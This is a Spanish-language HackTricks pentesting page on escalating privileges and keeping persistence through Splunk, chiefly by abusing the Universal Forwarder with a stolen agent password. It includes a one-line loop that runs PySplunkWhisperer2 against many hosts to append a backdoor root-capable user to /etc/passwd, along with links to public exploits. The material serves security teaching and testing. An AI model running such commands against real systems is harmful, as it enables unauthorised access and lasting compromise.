HackTricksSplunk LPE y Persistencia
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Si enumerando una m谩quina internamente o externamente encuentras Splunk en ejecuci贸n (puerto 8090), si tienes la suerte de conocer alguna credencial v谩lida puedes abusar del servicio de Splunk para ejecutar un shell como el usuario que ejecuta Splunk. Si lo est谩 ejecutando root, puedes escalar privilegios a root.
Adem谩s, si ya eres root y el servicio de Splunk no est谩 escuchando solo en localhost, puedes robar el archivo de contrase帽a del servicio de Splunk y crackear las contrase帽as, o agregar nuevas credenciales a 茅l. Y mantener persistencia en el host.
En la primera imagen a continuaci贸n puedes ver c贸mo se ve una p谩gina web de Splunkd.
Resumen de la Explotaci贸n del Agente Splunk Universal Forwarder
Para m谩s detalles, consulta la publicaci贸n https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. Este es solo un resumen:
Descripci贸n de la Explotaci贸n: Una explotaci贸n que apunta al Agente Splunk Universal Forwarder (UF) permite a los atacantes con la contrase帽a del agente ejecutar c贸digo arbitrario en sistemas que ejecutan el agente, comprometiendo potencialmente toda una red.
Puntos Clave:
- El agente UF no valida las conexiones entrantes ni la autenticidad del c贸digo, lo que lo hace vulnerable a la ejecuci贸n no autorizada de c贸digo.
- Los m茅todos comunes de adquisici贸n de contrase帽as incluyen localizarlas en directorios de red, comparticiones de archivos o documentaci贸n interna.
- La explotaci贸n exitosa puede llevar a acceso a nivel de SYSTEM o root en hosts comprometidos, exfiltraci贸n de datos y mayor infiltraci贸n en la red.
Ejecuci贸n de la Explotaci贸n:
- El atacante obtiene la contrase帽a del agente UF.
- Utiliza la API de Splunk para enviar comandos o scripts a los agentes.
- Las acciones posibles incluyen extracci贸n de archivos, manipulaci贸n de cuentas de usuario y compromiso del sistema.
Impacto:
- Compromiso total de la red con permisos a nivel de SYSTEM/root en cada host.
- Potencial para deshabilitar el registro para evadir la detecci贸n.
- Instalaci贸n de puertas traseras o ransomware.
Ejemplo de Comando para la Explotaci贸n:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
Exploits p煤blicos utilizables:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
Abusando de las consultas de Splunk
Para m谩s detalles, consulta la publicaci贸n https://blog.hrncirik.net/cve-2023-46214-analysis
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.